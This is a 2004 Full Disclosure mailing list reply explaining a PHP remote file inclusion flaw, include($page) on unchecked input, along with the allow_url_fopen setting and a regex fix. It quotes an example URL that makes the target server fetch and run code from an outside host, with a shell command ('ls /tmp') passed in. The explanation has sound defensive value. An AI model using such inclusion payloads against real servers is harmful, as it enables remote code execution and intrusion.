Full Disclosure mailing list archives
Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
From: <m.esco () wp pl>
Date: Sat, 3 Jul 2004 10:19:19 +0200
Is this cool or not, I can't tell.:P
Example: www.fuck-teso.com/index.php?page=whitehats.php index.php: ... include($page); // <--- fucking lame ... So, you don't know, but there is a BIGBUG.
No, it is a f*****g lame programmer bug :)
You can include a remote page, that contains php code, that will be executed on the fuck-teso server:
www.fuck-teso.com/index.php?page=http://www.ihcteam.com/we-own-teso.txt?cmd= ls%20/tmp On most of php servers configuration directive allow_url_fopen (http://php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen) is set to off, so you cannot parse remote script to that server. Sometimes it is not, and there is some possibility of doing the above, of course, only when some coder have not done his job properly. Solution to "the problem": Use your brain while coding, and test your code. Quick and usefull solution: include(preg_replace("|[^\w\.]|", "", $page)); Best regards m.esco _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Frog M@n (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! m.esco (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Duncan Hill (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Maarten (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Rudolf Polzer (Jul 03)
- Re: [FD] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Thomas Binder (Jul 05)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Maarten (Jul 03)
- Message not available
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! Rudolf Polzer (Jul 03)
- Re: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!! nicolas vigier (Jul 04)